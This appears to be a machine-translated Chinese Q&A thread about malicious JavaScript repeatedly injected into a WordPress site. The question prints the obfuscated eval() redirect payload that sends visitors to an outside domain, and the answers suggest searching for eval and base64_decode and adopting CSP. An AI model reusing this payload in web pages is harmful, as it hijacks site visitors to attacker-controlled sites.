Wordpress上的Javascript注入預防

Question

我在wordpress上的博客注入了以下惡意腳本：

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{}))

它導航到：

• http://oxxtm.com/重定向到：
  • http://www.html5website.com/

我已經禁用了一些插件，但似乎問題出在其他地方，因為我使用以下插件並且它們似乎有良好的聲譽：

• Akismet在
• 登錄驗證碼
• 免費和簡單的聯系表單插件 - PirateForms（我的Zerif Lite主題推薦）
• SMTP郵件程序
• WooCommerce

如果我找不到rootcause，你會建議處理“重定向”事件以保持網站運行嗎？ 如果是這樣，如果有重定向指向http://oxxtm.com/並使用javascript中止它我怎么能處理？

我嘗試使用onunload和onbeforeunload事件，但它似乎是注入的eval ，在事件操作甚至注冊之前運行。

我可以看到它在wo​​rdpress中被注入不同的PHP頁面（有時只有一個），我不知道是否有一個常見的PHP文件，我可以在其中包含一個腳本來阻止這個惡意腳本的操作。

我已經多次刪除了惡意腳本，但它會一次又一次地被注入。 我在搜索原因時需要對症狀進行處理，否則網站將無法使用。 但是，我不明白腳本是如何注入的。

Answer 1

在所有文件中搜索以下內容： eval(function()

它將顯示包含此代碼的每個文件。

否則，嘗試搜索： base64_decode

這是一個允許解碼base64編碼文本的函數，惡意PHP文件經常使用它來注入一些搜索eval(無法檢測到的代碼eval(

如果問題仍然存在，請在此處回答，我會盡力幫助您。

Answer 2

另外，作為保護客戶端免受XSS影響的附加功能，我建議您在清洗注射后端后使用CSP。 您可以閱讀更多相關信息： https ： //developer.mozilla.org/en/docs/Web/Security/CSP這不是一個銀彈，但很高興能夠保護用戶。